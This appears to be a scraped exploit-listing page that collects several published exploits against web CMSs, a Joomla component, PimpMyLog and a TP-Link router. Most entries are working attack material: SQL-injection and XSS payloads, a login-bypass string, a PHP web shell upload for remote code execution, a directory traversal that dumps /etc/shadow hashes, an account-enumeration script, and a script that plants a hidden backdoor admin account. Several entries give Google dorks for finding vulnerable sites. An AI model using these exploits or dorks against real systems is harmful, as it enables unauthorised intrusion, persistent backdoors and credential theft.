Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : CMS porViaX v2.0 Sql Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit) | | # Vendor : https://codecanyon.net/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : noticias?pg=\ [+] http://127.0.0.1/muritiba.ba.govbr/noticias?pg=%5c <==== inject here [+] Login http://127.0.0.1/muritiba.ba.govbr/admin/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code># Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal # Date: 13/7/2023 # Exploit Author: Anish Feroz (Zeroxinn) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7::: </code></pre>

<pre><code>Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE) Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr) 3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?> 4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd Poc request POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1 Host: localhost Content-Length: 577 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti Connection: close ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="upload" 1 ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="userfile"; filename="poc.zip" Content-Type: application/zip PKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a); ?> blabalaboalpoc.php blablabla ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryBRByJwW3CUSHOcBT-- </code></pre>

<pre><code>#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) #Application: Backdrop Cms #Version: v1.25.1 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://backdropcms.org/ #Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== 1. login to account 2. go to http://localhost/backdrop/?q=admin/config/system/site-information 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/backdrop/files/malas_2.svg) Request POST /backdrop/?q=admin/config/system/site-information HTTP/1.1 Host: localhost Content-Length: 2116 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/backdrop/?q=admin/config/system/site-information Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E Connection: close ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_name" My Backdrop Site ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_slogan" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_mail" admin@admin.com ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_logo_path" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_favicon_upload]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_favicon_path" core/misc/favicon.ico ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_frontpage" home ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_403" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_404" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_build_id" form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_token" siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40 ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_id" system_site_information_settings ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="op" Save configuration ------WebKitForm </code></pre>

<pre><code># Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) # Google Dork: inurl:"index.php?option=com_booking" # Date: 07/12/2023 # Exploit Author: qw3rTyTy # Vendor Homepage: http://www.artio.net/ # Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download # Version: 2.4.9 # Tested on: Slackware/Nginx/Joomla! 3.10.11 # ## # File: site/booking.php # # <?php # [...] #18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php'); # [...] # # File: admin/booking.php # # <?php # [...] #104 if (class_exists(($classname = AImporter::controller()))) { #105 $controller = new $classname(); #106 /* @var $controller JController */ #107 $controller->execute(JRequest::getVar('task')); #108 $controller->redirect(); #109 } # [...] # # File: admin/controllers/customer.php # # <?php # [...] #240 function getUserData() { #241 $user = JFactory::getUser(JRequest::getInt('id')); #242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email); #243 die(json_encode($data)); #244 } # [...] # # A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'. # # curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123 # # So, an attacker can easily enumerate all accounts by bruteforcing. # ## import argparse import urllib.parse import requests from sys import exit from time import sleep def enumerateAccounts(options): i = 1 url = options.url url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id=" while True: try: response = requests.get("{}{}".format(url, str(i))) if response.status_code == 200: try: jsondocument = response.json() if jsondocument["name"] != None: print(jsondocument) except requests.exceptions.JSONDecodeError: raise else: break except Exception as ex: print(ex) break i += 1 def main(): p = argparse.ArgumentParser() p.add_argument("-u", "--url", type=str, required=True) parsed = p.parse_args() try: t = urllib.parse.urlparse(parsed.url) except ValueError as ex: print(ex) exit() if not t[0].startswith("http") and not t[0].startswith("https"): print("Improper URL given.") exit() if len(t[1]) == 0: print("Improper URL given.") exit() enumerateAccounts(parsed) if __name__ == "__main__": main() </code></pre>

<pre><code>==================================================================================================================================== | # Title : CMS EngePlus v2.0.1 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/ | | # Dork : intext:Desenvolvido por EngePlus site:br | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /conteudo.php?int=noticia&codigo_not=8'<script>alert(/indoushka/);</script> [+] http://127.0.0.1/rebemilcombr/conteudo.php?int=noticia&codigo_not=8%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code># Exploit Title: PimpMyLog v1.7.14 - Improper access control # Date: 2023-07-10 # Exploit Author: thoughtfault # Vendor Homepage: https://www.pimpmylog.com/ # Software Link: https://github.com/potsky/PimpMyLog # Version: 1.5.2-1.7.14 # Tested on: Ubuntu 22.04 # CVE : N/A # Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys. import requests import argparse from base64 import b64encode js = """var table = document.getElementById("userlisttable"); var rows = table.getElementsByTagName("tr"); for (var i = 0; i < rows.length; i++) { var cells = rows[i].getElementsByTagName("td"); for (var j = 0; j < cells.length; j++) { var anchors = cells[j].getElementsByTagName("a"); for (var k = 0; k < anchors.length; k++) { if ( anchors[k].innerText === "{}" || anchors[k].innerText.includes("atob(") || anchors[k].querySelector("script") !== null ) { rows[i].parentNode.removeChild(rows[i]); } } } } var userCountElement = document.querySelector('.lead'); var userCountText = userCountElement.textContent; var userCount = parseInt(userCountText); if(!isNaN(userCount)){ userCount--; userCountElement.textContent = userCount + ' Users'; }""" payload = "<script>eval(atob('{}'));</script>" def backdoor(url, username, password): config_url = url + '/inc/configure.php' print("[*] Creating admin account...") r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password}) if r.status_code != 200: print("[!] An error occured") return print("[*] Hiding admin account...") base64_js = b64encode(js.format(username).encode()).decode() xss_payload = payload.format(base64_js) r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password}) if r.status_code != 200: print("[!] An error occured") return print("[*] Exploit finished!") parser = argparse.ArgumentParser() parser.add_argument('--url', help='The base url of the target', required=True) parser.add_argument('--username', default='backdoor', help='The username of the backdoor account') parser.add_argument('--password', default='backdoor', help='The password of the backdoor account') args = parser.parse_args() backdoor(args.url.rstrip('/'), args.username, args.password) </code></pre>

<pre><code>====================================================================================================================================== | # Title : ِCMS D-Creations v1.0 auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://codecanyon.net/ | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Use admin : admin'-- - & pass : P@cK3t [+] panel : http://127.0.0.1/cetithkorg/Dashboard.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : CCOM Events CMS v0.1.02 upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://www.cyberunivers.com/ | | # Dork : "details_news.php?id_news= " | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them. [+] use payload : /js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php [+] http://127.0.0.1/sacot-dzcom/js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>